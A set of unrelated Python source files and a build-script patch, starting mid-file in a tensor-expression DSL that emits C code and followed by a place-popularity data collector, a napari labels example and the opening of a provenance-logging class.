elif isinstance(value, six.integer_types) or type(value) is float:
array = np.array([value])
else:
raise TypeError('ConstTensors can wrap lists, tuples, and numpy arrays')
super(self.__class__, self).__init__(lang.CONST_TENSOR, TensorType.like(array))
# build up protobuf representation
flat_data = array.flatten(order='C').tolist()
vals = list(_ConstTensor.proto_data_lut.values())
keys = list(_ConstTensor.proto_data_lut.keys())
proto_data_retrieval = vals[keys.index(self.tensor_type.dtype)]
proto_data = proto_data_retrieval(self.proto_expr)
proto_data.extend(flat_data)
super(self.__class__, self)._register()
def to_array(self):
vals = list(_ConstTensor.proto_data_lut.values())
keys = list(_ConstTensor.proto_data_lut.keys())
proto_data_retrieval = vals[keys.index(self.tensor_type.dtype)]
proto_data = proto_data_retrieval(self.proto_expr)
data = np.array(proto_data, dtype=self.dtype.as_numpy())
return data
@staticmethod
def from_proto(proto, input_exprs):
dtype = DType(proto.tensor_type.dtype)
vals = list(_ConstTensor.proto_data_lut.values())
keys = list(_ConstTensor.proto_data_lut.keys())
proto_data_retrieval = vals[keys.index(dtype)]
proto_data = proto_data_retrieval(proto)
data = np.array(proto_data, dtype=dtype.as_numpy())
return _ConstTensor(data)
def gen_ptr(self):
tipe = self.dtype.as_cstr()
name = self.name
elems = self.size
return string.Template('const ${tipe} ${name}[${elems}]').substitute(locals())
def gen_c(self):
return ''
def position_in(workgroup_shape):
"""
Define the workgroup shape and retrieve a tensor expression that refers to the current position in that
workgroup shape.
:param workgroup_shape: An iterable of ints defining the shape of the workgroup
:return: a tensor expression which references the current workgroup position
"""
return PositionTensor(workgroup_shape)
class PositionTensor(_TensorExpression, _Readable):
"""
The position expression which refers to the current position within the workgroup shape
"""
def __init__(self, workgroup_shape):
if isinstance(workgroup_shape, six.integer_types):
self.workgroup_shape = [workgroup_shape]
else:
try:
for elem in workgroup_shape:
if not isinstance(elem, six.integer_types):
raise TypeError
except TypeError:
raise TypeError('workgroup_shape must be an int or an iterable of ints')
self.workgroup_shape = workgroup_shape
workgroup_dims = len(self.workgroup_shape)
tensor_type = TensorType([workgroup_dims], uint32)
super(self.__class__, self).__init__(lang.POSITION, tensor_type)
self.proto_expr.uint32_data.extend(self.workgroup_shape)
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return PositionTensor(proto.uint32_data)
def gen_ptr(self):
tipe = self.dtype.as_cstr()
name = self.name
elems = self.size
p = string.Template('${tipe} ${name}[${elems}]').substitute(locals())
def gen_c(self):
workgroup_block_size = [1]
for cur_dim in range(self.size-1, 0, -1):
workgroup_block_size.append(workgroup_block_size[-1]*self.workgroup_shape[cur_dim])
workgroup_block_size.reverse()
position_vals = []
remainder = 'worker_index'
for cur_block in workgroup_block_size:
cur_index = '('+remainder+')/'+str(cur_block)
position_vals.append(cur_index)
remainder = remainder + ' % ' + str(cur_block)
return 'const uint32_t position['+str(self.size)+'] = {' + _list_to_str(position_vals) + '};\n'
def variable(initial_value, dtype):
"""
Function for declaring a new variable
:param initial_value: The initial value of the variable
:param dtype: The DType of the variable
:return: The variable expression
"""
if isinstance(initial_value, six.integer_types) or isinstance(initial_value, float):
return Variable(dtype, _ConstScalar(initial_value))
elif issubclass(initial_value.__class__, Scalar):
var = Variable(dtype, _ConstScalar(0))
var <<= initial_value
return var
else:
raise TypeError('Must initialize a variable with a numeric constant or a scalar expression.')
class Variable(Scalar):
"""
A variable expression
"""
def __init__(self, dtype, intial_const):
if not isinstance(intial_const, _ConstScalar):
raise TypeError('Variables must be initialized with a constant scalar')
if not isinstance(dtype, DType):
raise TypeError('dtype must be a DType')
super(self.__class__, self).__init__(lang.VARIABLE, dtype)
self.input_exprs = [intial_const]
super(self.__class__, self)._register()
def __ilshift__(self, other):
_AssignVariable(self, other)
return self
@staticmethod
def from_proto(proto, input_exprs):
return Variable(DType(proto.dtype), input_exprs[0])
def gen_c(self):
return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + ';\n'
def cast(value, dtype):
"""
Cast a scalar expression as a new data type
:param value: The scalar expression
:param dtype: The new data type
:return: The casted scalar expression
"""
return _Cast(dtype, value)
class _Cast(Scalar):
"""
The casting expression
"""
def __init__(self, dtype, target):
if not isinstance(dtype, DType):
raise TypeError('dtype must be a DType')
if not issubclass(target.__class__, Scalar):
raise TypeError('Can only cast scalar expressions. Received ' + str(type(target)) + ': ' +
str(target))
super(self.__class__, self).__init__(lang.CAST, dtype)
self.input_exprs = [target]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _Cast(DType(proto.dtype), input_exprs[0])
def gen_c(self):
return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + ';\n'
class _AssignVariable(_Expression):
"""
The variable assignment expression
"""
def __init__(self, scalar_expr, value_expr):
if not isinstance(scalar_expr, Variable):
raise TypeError('Can only assign to a variable')
if issubclass(value_expr.__class__, Scalar):
value = value_expr
else:
value = _ConstScalar(value_expr)
value = cast(value, scalar_expr.dtype)
super(self.__class__, self).__init__(lang.ASSIGN_VARIABLE)
t1 = scalar_expr.proto_expr.dtype
t2 = value.proto_expr.dtype
if not t1 == t2:
t1_str = lang.DType.Name(t1)
t2_str = lang.DType.Name(t2)
raise TypeError('cannot assign ' + t2_str + ' to ' + t1_str + ' scalar')
self.input_exprs = [scalar_expr, value]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _AssignVariable(input_exprs[0], input_exprs[1])
def gen_c(self):
return self.input_exprs[0].name + ' = ' + self.input_exprs[1].name + ';\n'
class _UnaryMath(Scalar):
"""
Unary expressions which transform a single scalar expression
"""
code_map = {
lang.ACOS: {lang.FLOAT32: 'acosf', lang.FLOAT64: 'acos'},
lang.ASIN: {lang.FLOAT32: 'asinf', lang.FLOAT64: 'asin'},
lang.ATAN: {lang.FLOAT32: 'atanf', lang.FLOAT64: 'atan'},
lang.COS: {lang.FLOAT32: 'cosf', lang.FLOAT64: 'cos'},
lang.COSH: {lang.FLOAT32: 'coshf', lang.FLOAT64: 'cosh'},
lang.SIN: {lang.FLOAT32: 'sinf', lang.FLOAT64: 'sin'},
lang.SINH: {lang.FLOAT32: 'sinhf', lang.FLOAT64: 'sinh'},
lang.TAN: {lang.FLOAT32: 'tanf', lang.FLOAT64: 'tan'},
lang.TANH: {lang.FLOAT32: 'tanhf', lang.FLOAT64: 'tanh'},
lang.EXP: {lang.FLOAT32: 'expf', lang.FLOAT64: 'exp'},
lang.LOG: {lang.FLOAT32: 'logf', lang.FLOAT64: 'log'},
lang.LOG10: {lang.FLOAT32: 'log10f', lang.FLOAT64: 'log10'},
lang.SQRT: {lang.FLOAT32: 'sqrtf', lang.FLOAT64: 'sqrt'},
lang.CEIL: {lang.FLOAT32: 'ceilf', lang.FLOAT64: 'ceil'},
lang.FLOOR: {lang.FLOAT32: 'floorf', lang.FLOAT64: 'floor'},
lang.ABS: {lang.FLOAT32: 'fabsf', lang.FLOAT64: 'fabs', lang.INT8: 'abs_8',
lang.INT16: 'abs_16', lang.INT32: 'abs', lang.INT64: 'labs'},
lang.NEGATE: {lang.FLOAT32: '-', lang.FLOAT64: '-',
lang.INT8: '-', lang.INT16: '-', lang.INT32: '-', lang.INT64: '-'},
lang.NOT: {lang.FLOAT32: '!', lang.FLOAT64: '!',
lang.INT8: '!', lang.INT16: '!', lang.INT32: '!', lang.INT64: '!',
lang.UINT8: '!', lang.UINT16: '!', lang.UINT32: '!', lang.UINT64: '!'},
lang.ISINF: {lang.FLOAT32: 'isinf', lang.FLOAT64: 'isinf'},
lang.ISFINITE: {lang.FLOAT32: 'isfinite', lang.FLOAT64: 'isfinite'},
lang.ISNAN: {lang.FLOAT32: 'isnan', lang.FLOAT64: 'isnan'}
}
def __init__(self, arg, expr_code):
if expr_code not in list(_UnaryMath.code_map.keys()):
raise ValueError(lang.ExpressionCode.Name(expr_code) + 'is an invalid unary math code.')
if arg.dtype.proto_dtype not in list(_UnaryMath.code_map[expr_code].keys()):
raise ValueError(lang.DType.Name(arg.dtype.proto_dtype) +
' arguments not supported for unary math function ' +
lang.ExpressionCode.Name(expr_code))
if not issubclass(arg.__class__, Scalar):
raise TypeError('Must apply math functions to scalar expressions. Received: ' + str(arg))
super(self.__class__, self).__init__(expr_code, arg.dtype)
self.input_exprs = [arg]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _UnaryMath(input_exprs[0], proto.code)
def gen_c(self):
func_string = _UnaryMath.code_map[self.proto_expr.code][self.proto_expr.dtype]
return self.dtype.as_cstr() + ' ' + self.name + ' = ' + func_string + '(' + self.input_exprs[0].name + ');\n'
def arccos(x):
return _UnaryMath(x, lang.ACOS)
def arcsin(x):
return _UnaryMath(x, lang.ASIN)
def arctan(x):
return _UnaryMath(x, lang.ATAN)
def cos(x):
return _UnaryMath(x, lang.COS)
def cosh(x):
return _UnaryMath(x, lang.COSH)
def sin(x):
return _UnaryMath(x, lang.SIN)
def sinh(x):
return _UnaryMath(x, lang.SINH)
def tan(x):
return _UnaryMath(x, lang.TAN)
def tanh(x):
return _UnaryMath(x, lang.TANH)
def exp(x):
return _UnaryMath(x, lang.EXP)
def log(x):
return _UnaryMath(x, lang.LOG)
def log10(x):
return _UnaryMath(x, lang.LOG10)
def sqrt(x):
return _UnaryMath(x, lang.SQRT)
def ceil(x):
return _UnaryMath(x, lang.CEIL)
def floor(x):
return _UnaryMath(x, lang.FLOOR)
def absolute(x):
return _UnaryMath(x, lang.ABS)
def logical_not(x):
return _UnaryMath(x, lang.NOT)
def isinf(x):
return _UnaryMath(x, lang.ISINF)
def isfinite(x):
return _UnaryMath(x, lang.ISFINITE)
def isnan(x):
return _UnaryMath(x, lang.ISNAN)
class _Limits(Scalar):
"""
A limit expression for floating point types
"""
code_map = {
lang.MIN_VALUE: {lang.FLOAT32: 'FLT_MIN', lang.FLOAT64: 'DBL_MIN'},
lang.MAX_VALUE: {lang.FLOAT32: 'FLT_MAX', lang.FLOAT64: 'DBL_MAX'},
lang.EPSILON: {lang.FLOAT32: 'FLT_EPSILON', lang.FLOAT64: 'DBL_EPSILON'},
}
def __init__(self, expr_code, t):
if expr_code not in list(_Limits.code_map.keys()):
raise ValueError(lang.ExpressionCode.Name(expr_code) + 'is an invalid limits code.')
if not issubclass(t.__class__, DType):
raise TypeError('Must apply limits functions to dtypes. Received: ' + str(t))
if t.as_proto() not in list(_Limits.code_map[expr_code].keys()):
raise ValueError(str(t) +
' arguments not supported for limits function ' +
lang.ExpressionCode.Name(expr_code))
super(self.__class__, self).__init__(expr_code, t)
self.name = _Limits.code_map[expr_code][t.as_proto()]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _Limits(proto.code, DType(proto.dtype))
def gen_c(self):
return ''
def min_value(dtype):
"""
Function for getting the minimum normalized positive value of
floating point types
:param dtype: The DType of the variable
:return: minimum value for dtype
"""
return _Limits(lang.MIN_VALUE, dtype)
def max_value(dtype):
"""
Function for getting the maximum value of floating point types
:param dtype: The DType of the variable
:return: maximum value for dtype
"""
return _Limits(lang.MAX_VALUE, dtype)
def epsilon(dtype):
"""
Function for getting difference between 1.0 and the next representable
value for floating point types
:param dtype: The DType of the variable
:return: epsilon value for dtype
"""
return _Limits(lang.EPSILON, dtype)
class _BinaryMath(Scalar):
"""
Binary expressions which transform two scalars into another
"""
code_map = {
lang.ADD: {},
lang.SUBTRACT: {},
lang.MULTIPLY: {},
lang.DIVIDE: {},
lang.MODULO: {},
lang.EQUAL: {},
lang.NOTEQUAL: {},
lang.LESS: {},
lang.LESS_EQ: {},
lang.GREATER: {},
lang.GREATER_EQ: {},
lang.MIN: {},
lang.MAX: {},
lang.AND: {},
lang.OR: {},
lang.POW: {lang.FLOAT32: lambda x, y: 'powf('+x+','+y+')',
lang.FLOAT64: lambda x, y: 'pow('+x+','+y+')'},
lang.ATAN2: {lang.FLOAT32: lambda x, y: 'atan2f('+x+','+y+')',
lang.FLOAT64: lambda x, y: 'atan2('+x+','+y+')'},
}
for cur_type in supported_types:
code_map[lang.MIN][cur_type.proto_dtype] = lambda x, y: '((('+x+')<('+y+'))?('+x+'):('+y+'))'
code_map[lang.MAX][cur_type.proto_dtype] = lambda x, y: '((('+x+')>('+y+'))?('+x+'):('+y+'))'
code_map[lang.ADD][cur_type.proto_dtype] = lambda x, y: '(' + x + ' + ' + y + ')'
code_map[lang.SUBTRACT][cur_type.proto_dtype] = lambda x, y: '(' + x + ' - ' + y + ')'
code_map[lang.MULTIPLY][cur_type.proto_dtype] = lambda x, y: '(' + x + ' * ' + y + ')'
code_map[lang.DIVIDE][cur_type.proto_dtype] = lambda x, y: '(' + x + ' / ' + y + ')'
code_map[lang.MODULO][cur_type.proto_dtype] = lambda x, y: '(' + x + ' % ' + y + ')'
code_map[lang.EQUAL][cur_type.proto_dtype] = lambda x, y: '(' + x + ' == ' + y + ')'
code_map[lang.NOTEQUAL][cur_type.proto_dtype] = lambda x, y: '(' + x + ' != ' + y + ')'
code_map[lang.LESS][cur_type.proto_dtype] = lambda x, y: '(' + x + ' < ' + y + ')'
code_map[lang.LESS_EQ][cur_type.proto_dtype] = lambda x, y: '(' + x + ' <= ' + y + ')'
code_map[lang.GREATER][cur_type.proto_dtype] = lambda x, y: '(' + x + ' > ' + y + ')'
code_map[lang.GREATER_EQ][cur_type.proto_dtype] = lambda x, y: '(' + x + ' >= ' + y + ')'
code_map[lang.AND][cur_type.proto_dtype] = lambda x, y: '(' + x + ' && ' + y + ')'
code_map[lang.OR][cur_type.proto_dtype] = lambda x, y: '(' + x + ' || ' + y + ')'
code_map[lang.MODULO][float32.proto_dtype] = lambda x, y: 'fmodf('+x+','+y+')'
code_map[lang.MODULO][float64.proto_dtype] = lambda x, y: 'fmod('+x+','+y+')'
def __init__(self, arg1, arg2, expr_code):
if expr_code not in list(_BinaryMath.code_map.keys()):
raise ValueError('Invalid binary math code')
code_str = lang.ExpressionCode.Name(expr_code)
# first try to wrap args as constants
try:
arg1_wrapped = _ConstScalar(arg1)
except TypeError:
arg1_wrapped = arg1
try:
arg2_wrapped = _ConstScalar(arg2)
except TypeError:
arg2_wrapped = arg2
# throw error if received a non-expression that could not be wrapped as constant
if not issubclass(arg1_wrapped.__class__, _Expression):
raise TypeError('Cannot apply ' + code_str + ' to first non-expression argument:\n' + str(arg1_wrapped))
if not issubclass(arg2_wrapped.__class__, _Expression):
raise TypeError('Cannot apply ' + code_str + ' to second non-expression argument:\n' + str(arg2_wrapped))
# throw error if received a non-scalar expression
if not issubclass(arg1_wrapped.__class__, Scalar):
raise TypeError('First argument to ' + code_str + ' must be a scalar expression, got:\n' + str(arg1_wrapped))
if not issubclass(arg2_wrapped.__class__, Scalar):
raise TypeError('Second argument to ' + code_str + ' must be a scalar expression, got:\n' + str(arg2_wrapped))
# cast constants according to the type of the other input
arg1_is_constant = type(arg1_wrapped) == _ConstScalar
arg2_is_constant = type(arg2_wrapped) == _ConstScalar
if not arg1_is_constant and not arg2_is_constant:
arg1_expr = arg1_wrapped
arg2_expr = arg2_wrapped
elif not arg1_is_constant and arg2_is_constant:
arg1_expr = arg1_wrapped
arg2_expr = cast(arg2_wrapped, arg1_wrapped.dtype)
elif arg1_is_constant and not arg2_is_constant:
arg1_expr = cast(arg1_wrapped, arg2_wrapped.dtype)
arg2_expr = arg2_wrapped
else:
raise TypeError('Cannot apply binary operator to two constants.')
t1 = arg1_expr.proto_expr.dtype
t2 = arg2_expr.proto_expr.dtype
if not t1 == t2:
t1_str = lang.DType.Name(t1)
t2_str = lang.DType.Name(t2)
raise TypeError('arg1 type (' + t1_str + ') must be the same as arg2 type (' + t2_str + ')')
if arg1_expr.dtype.proto_dtype not in list(_BinaryMath.code_map[expr_code].keys()):
raise ValueError(lang.DType.Name(arg1_expr.dtype.proto_dtype) +
' arguments not supported for binary math function ' +
lang.ExpressionCode.Name(expr_code))
super(self.__class__, self).__init__(expr_code, arg1_expr.dtype)
self.input_exprs = [arg1_expr, arg2_expr]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _BinaryMath(input_exprs[0], input_exprs[1], proto.code)
def gen_c(self):
func = _BinaryMath.code_map[self.proto_expr.code][self.dtype.proto_dtype]
func_str = func(self.input_exprs[0].name, self.input_exprs[1].name)
return self.dtype.as_cstr() + ' ' + self.name + ' = ' + func_str + ';\n'
def minimum(x, y):
return _BinaryMath(x, y, lang.MIN)
def maximum(x, y):
return _BinaryMath(x, y, lang.MAX)
def power(x, y):
return _BinaryMath(x, y, lang.POW)
def arctan2(x, y):
return _BinaryMath(x, y, lang.ATAN2)
def logical_and(x, y):
return _BinaryMath(x, y, lang.AND)
def logical_or(x, y):
return _BinaryMath(x, y, lang.OR)
class LocalTensor(_TensorExpression, _Readable, _Writable):
"""
Expression which references a worker-local tensor
"""
def __init__(self, initial_value):
if type(initial_value) is not _ConstTensor:
raise TypeError('Tensors must be initialized by ConstTensors')
super(self.__class__, self).__init__(lang.TENSOR, initial_value.tensor_type)
self.input_exprs = [initial_value]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return LocalTensor(input_exprs[0])
def gen_ptr(self):
tipe = self.dtype.as_cstr()
name = self.name
elems = self.size
return string.Template('${tipe} ${name}[${elems}]').substitute(locals())
def gen_c(self):
return self.gen_ptr() + ' = ' + self.input_exprs[0].name + ';\n'
def zeros(shape, dtype):
"""
Declare a new worker-local tensor with all elements initialized to zero.
:param shape: the tensor shape
:param dtype: the tensor data type
:return: the tensor expression
"""
np_dtype = DType(dtype).as_numpy()
init = _ConstTensor(np.zeros(shape, dtype=np_dtype))
return LocalTensor(init)
def ones(shape, dtype):
"""
Declare a new worker-local tensor with all elements initialized to one.
:param shape: the tensor shape
:param dtype: the tensor data type
:return: the tensor expression
"""
np_dtype = DType(dtype).as_numpy()
init = _ConstTensor(np.ones(shape, dtype=np_dtype))
return LocalTensor(init)
def _check_index(target_expr, index_expr):
"""
helper function for making sure that an index is valid
:param target_expr: the target tensor
:param index_expr: the index
:return: the index, wrapped as an expression if necessary
"""
if issubclass(index_expr.__class__, _Expression):
index = index_expr
else:
index = _ConstScalar(index_expr)
if index.proto_expr.dtype is lang.UNDEFINED_TYPE:
raise TypeError('Can only index with a scalar.')
if type(index) is _ConstScalar:
if target_expr.size <= index.value() or index.value() < 0:
raise IndexError('Index out of bounds.')
return index
class _AssignTensor(_Expression):
"""
Expression for assigning to tensors
"""
def __init__(self, tensor_expr, index_expr, value_expr):
super(self.__class__, self).__init__(lang.ASSIGN_TENSOR)
if not issubclass(tensor_expr.__class__, _Writable):
raise TypeError('Can only assign to writable tensors.')
index = _check_index(tensor_expr, index_expr)
# try to wrap value as an expression if it's not
if issubclass(value_expr.__class__, _Expression):
value = value_expr
else:
value = _ConstScalar(value_expr)
value = cast(value, tensor_expr.dtype)
# make sure that value is same type as tensor
t1 = tensor_expr.proto_expr.tensor_type.dtype
t2 = value.proto_expr.dtype
if not t1 == t2:
t1_str = lang.DType.Name(t1)
t2_str = lang.DType.Name(t2)
raise TypeError('cannot assign ' + t2_str + ' to ' + t1_str + ' tensor')
self.input_exprs = [tensor_expr, index, value]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _AssignTensor(input_exprs[0], input_exprs[1], input_exprs[2])
def gen_c(self):
return self.input_exprs[0].name + '[' + self.input_exprs[1].name + '] = ' + self.input_exprs[2].name + ';\n'
class _ReadTensor(Scalar):
"""
Expression for reading from tensors
"""
def __init__(self, tensor_expr, index_expr):
if not issubclass(tensor_expr.__class__, _Readable):
raise TypeError('Can only index a readable tensor.')
index = _check_index(tensor_expr, index_expr)
super(self.__class__, self).__init__(lang.READ_TENSOR, tensor_expr.dtype)
self.input_exprs = [tensor_expr, index]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _ReadTensor(input_exprs[0], input_exprs[1])
def gen_c(self):
return self.dtype.as_cstr() + ' ' + self.name + ' = ' + self.input_exprs[0].name + '['+self.input_exprs[1].name+'];\n'
def arange(start, stop=None, step=None):
"""
Create an iterator to iterate over a range
:param start: The starting point in the iterator
:param stop: The stopping point in the iterator
:param step: The iterator step size
:return: None
:Example:
usage for accumulating a variable to 10::
accum = variable(0, uint64)
for i in arange(10):
accum <<= accum + 1
"""
if stop is None:
start_inferred = 0
stop_inferred = start
else:
start_inferred = start
stop_inferred = stop
if step is None:
step_inferred = 1
else:
step_inferred = step
# try to cast all non-expressions as constants
input_exprs = []
first_type = None
for val in [start_inferred, stop_inferred, step_inferred]:
if issubclass(val.__class__, _Expression):
input_exprs.append(val)
if first_type is None:
first_type = val.dtype
else:
input_exprs.append(_ConstScalar(val))
if first_type is None:
first_type = _ConstScalar(start).dtype
# cast all constants as the first dtype
cast_exprs = []
for expr in input_exprs:
if type(expr) is _ConstScalar:
cast_exprs.append(cast(expr, first_type))
else:
cast_exprs.append(expr)
index = variable(0, first_type)
return _Range(index, cast_exprs[0], cast_exprs[1], cast_exprs[2])
class _Range(_Expression, six.Iterator):
"""
A range expression
"""
def __init__(self, index, start, stop, step):
self.block_done = False
first_type = index.dtype
for expr in [start, stop, step]:
if expr.dtype != first_type:
raise TypeError('All input expressions must have the same type.')
super(self.__class__, self).__init__(lang.RANGE)
self.input_exprs = [index, start, stop, step]
super(self.__class__, self)._register()
def __iter__(self):
return self
def __next__(self):
if not self.block_done:
self.block_done = True
return self.input_exprs[0]
else:
_EndRange()
raise StopIteration
@staticmethod
def from_proto(proto, input_exprs):
return _Range(*input_exprs)
def gen_c(self):
index_name = self.input_exprs[0].name
start_name = self.input_exprs[1].name
stop_name = self.input_exprs[2].name
step_name = self.input_exprs[3].name
for_string = 'for(${index_name} = ${start_name}; ' \
'((${index_name} < ${stop_name})&&(${step_name}>0)) || ' \
'((${index_name} > ${stop_name})&&(${step_name}<0)); ' \
'${index_name}+=${step_name}){\n'
return string.Template(for_string).substitute(locals())
class _EndRange(_Expression):
"""
The end range expression
"""
def __init__(self):
super(self.__class__, self).__init__(lang.ENDRANGE)
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _EndRange()
def gen_c(self):
return '}\n'
def if_(condition):
"""
conditional execution, must be used as part of a ``with`` block
:param condition: The condition under which to execute the body of the with block
:Example:
Clip ``input_tensor`` to a maximum value of 1::
y = variable(0, input_tensor.dtype)
y = input_tensor[some_index]
with if_(y > 1):
y <<= 1
output_tensor[some_index] = y
"""
return _If(condition)
class _If(_Expression):
"""
The if expression
"""
def __init__(self, condition):
if not issubclass(condition.__class__, Scalar):
if isinstance(condition, bool):
raise TypeError('Attempting to use a constant boolean, %s, with the operator if_ expression. Use the '
'python if instead since this can be interpreted at operator '
'definition time.' % condition)
raise TypeError('Condition must be a scalar expression, instead got: ' + str(condition))
super(self.__class__, self).__init__(lang.IF)
self.input_exprs = [condition]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _If(input_exprs[0])
def gen_c(self):
return 'if('+self.input_exprs[0].name+'){\n'
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
_EndIf()
def elif_(condition):
"""
else if conditional execution, must be used as part of a ``with`` block and must come directly after
another if or else if block.
:param condition: The condition under which to execute the body of the with block
:Example:
Clip ``input_tensor`` to a maximum value of 1 and a minimum value of -1::
y = variable(0, input_tensor.dtype)
y = input_tensor[some_index]
with if_(y > 1):
y <<= 1
with elif_(y <-1):
y <<= -1
output_tensor[some_index] = y
:param condition: The condition under which to execute the body of the with block
:return: None
"""
return _ElseIf(condition)
class _ElseIf(_Expression):
"""
The elif expression
"""
def __init__(self, condition):
if not issubclass(condition.__class__, Scalar):
raise TypeError('Condition must be a scalar expression')
super(self.__class__, self).__init__(lang.ELSEIF)
self.input_exprs = [condition]
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _ElseIf(input_exprs[0])
def gen_c(self):
return '}\nelse if('+self.input_exprs[0].name+'){\n'
def __enter__(self):
ExpressionDAG.remove_endif()
def __exit__(self, exc_type, exc_val, exc_tb):
_EndIf()
def else_():
"""
else conditional execution, must be used as part of a ``with`` block and must come directly after
another if or else if block.
:Example:
Clip ``input_tensor`` to a maximum value of 1 and a minimum value of -1, and zero it
out if it is within that range::
y = variable(0, input_tensor.dtype)
with if_(y > 1):
y <<= 1
with elif_(y <-1):
y <<= -1
with else_():
y <<= 0
output_tensor[some_index] = y
"""
return _Else()
class _Else(_Expression):
"""
The else expression
"""
def __init__(self):
super(self.__class__, self).__init__(lang.ELSE)
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _Else()
def gen_c(self):
return '}\nelse{\n'
def __enter__(self):
ExpressionDAG.remove_endif()
def __exit__(self, exc_type, exc_val, exc_tb):
_EndIf()
class _EndIf(_Expression):
"""
The endif expression
"""
def __init__(self):
super(self.__class__, self).__init__(lang.ENDIF)
super(self.__class__, self)._register()
@staticmethod
def from_proto(proto, input_exprs):
return _EndIf()
def gen_c(self):
return '}\n'
|
import os
from datetime import datetime, timedelta
import pandas as pd
import populartimes
from apikeys import API_KEY
HOURS_OF_INTEREST = {
'restaurant': range(9, 23),
'bar': list(range(12, 24)) + list(range(0, 4)),
'club': list(range(20, 24)) + list(range(0, 6)),
'train station': range(5, 21),
'tourist information': range(8, 21),
'sights': range(6, 21),
'park': range(6, 21),
'mall': range(6, 21),
'supermarket': range(6, 21),
'street market': range(6, 21),
'hardware store': range(6, 21),
}
DATADIR = 'data/popularity'
EVERY_NTH_HOUR = 3 # None
ON_WEEKDAYS = (1, 3, 5) # = Tue, Thu, Sat
#%%
pois = pd.read_csv('data/places_of_interest_tz.csv') #.sample(20)
utcnow = datetime.utcnow()
utcdate_ymd = utcnow.strftime('%Y-%m-%d')
utcweekday = utcnow.weekday()
utchour = utcnow.hour
datadir_today = os.path.join(DATADIR, utcdate_ymd)
if not os.path.exists(datadir_today):
print('creating directory', datadir_today, '\n')
os.mkdir(datadir_today, mode=0o755)
#%%
resultrows = []
n_queries = 0
for poi_i, poirow in pois.iterrows():
print('place of interest %d/%d: %s, %s' % (poi_i+1, len(pois), poirow.city, poirow.country))
poi_tzoffset = timedelta(seconds=poirow.tz_rawoffset + poirow.tz_dstoffset)
poi_localtime = utcnow + poi_tzoffset
poi_localwd = poi_localtime.weekday()
poi_localhour = poi_localtime.hour
if ON_WEEKDAYS and poi_localwd not in ON_WEEKDAYS:
print('skipping (local weekday is %d and will only run on weekdays %s)' % (poi_localwd, str(ON_WEEKDAYS)))
continue
if EVERY_NTH_HOUR and poi_localhour % EVERY_NTH_HOUR != 0:
print('skipping (local hour %d and will only run every %d hour)' % (poi_localhour, EVERY_NTH_HOUR))
continue
poi_hinterest = HOURS_OF_INTEREST.get(poirow['query'], list(range(6, 21)))
if not isinstance(poi_hinterest, list):
poi_hinterest = list(poi_hinterest)
if poi_localhour not in poi_hinterest:
print('> skipping (local hour %d not in hours of interest %s)'
% (poi_localhour, ', '.join(map(str, poi_hinterest))))
continue
try:
n_queries += 1
poptimes = populartimes.get_id(API_KEY, poirow.place_id)
except Exception: # catch any exception
poptimes = {}
if 'current_popularity' in poptimes and 'populartimes' in poptimes:
print('> got popularity data')
resultrows.append([
poirow.place_id,
utcdate_ymd,
utcweekday,
utchour,
poi_localtime.strftime('%Y-%m-%d'),
poi_localwd,
poi_localhour,
poptimes['current_popularity'],
poptimes['populartimes'][poi_localwd]['data'][poi_localhour]
])
else:
print('> failed to fetch popularity data')
print('\n')
#%%
print('made %d queries and got %d results' % (n_queries, len(resultrows)))
if resultrows:
popdata = pd.DataFrame(resultrows, columns=[
'place_id',
'utc_date', 'utc_weekday', 'utc_hour',
'local_date', 'local_weekday', 'local_hour',
'current_pop', 'usual_pop'
])
outfile = os.path.join(datadir_today, '%s_h%s.csv' % (utcdate_ymd, str(utchour).zfill(2)))
print('saving data to file', outfile)
popdata.to_csv(outfile, index=False)
else:
print('nothing to save')
print('done.')
|
--- ffi/build.py.orig 2018-09-21 19:31:30 UTC
+++ ffi/build.py
@@ -155,7 +155,7 @@ def main():
main_win32()
elif sys.platform.startswith('linux'):
main_posix('linux', '.so')
- elif sys.platform.startswith(('freebsd','openbsd')):
+ elif sys.platform.startswith(('freebsd','openbsd', 'dragonfly')):
main_posix('freebsd', '.so')
elif sys.platform == 'darwin':
main_posix('osx', '.dylib')
|
"""
Display a labels layer above of an image layer using the add_labels and
add_image APIs
"""
from skimage import data
from skimage.color import rgb2gray
from skimage.segmentation import slic
import napari
with napari.gui_qt():
astro = data.astronaut()
# initialise viewer with astro image
viewer = napari.view(astronaut=rgb2gray(astro), multichannel=False)
viewer.layers[0].colormap = 'gray'
# add the labels
# we add 1 because SLIC returns labels from 0, which we consider background
labels = slic(astro, multichannel=True, compactness=20) + 1
label_layer = viewer.add_labels(labels, name='segmentation')
# Set the labels layer mode to picker with a string
label_layer.mode = 'picker'
print(f'The color of label 5 is {label_layer.get_color(5)}')
|
import traceback
from requests_futures.sessions import FuturesSession
from time import sleep
from urllib.parse import urljoin
import json
from requests.exceptions import ConnectionError
import urllib3
import logging
from typing import List
logger = logging.getLogger('PROV')
offline_prov_log = logging.getLogger("OFFLINE_PROV")
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class _ProvPersister:
def __init__(self, df_name: str, service_url: str = "http://localhost:5000", context: str = None,
with_validation: bool = False, db_name: str = None,
bag_size: int = 1, should_store_offline_log: bool = False, online: bool = True):
self.retrospective_url = urljoin(service_url, "retrospective-provenance")
self.prospective_url = urljoin(service_url, "prospective-provenance")
self.df_name = df_name
self.context = context
self.with_validation = with_validation
self.db_name = db_name
self.session = FuturesSession()
self.requests_queue = list()
self.bag_size = bag_size
self.online = online
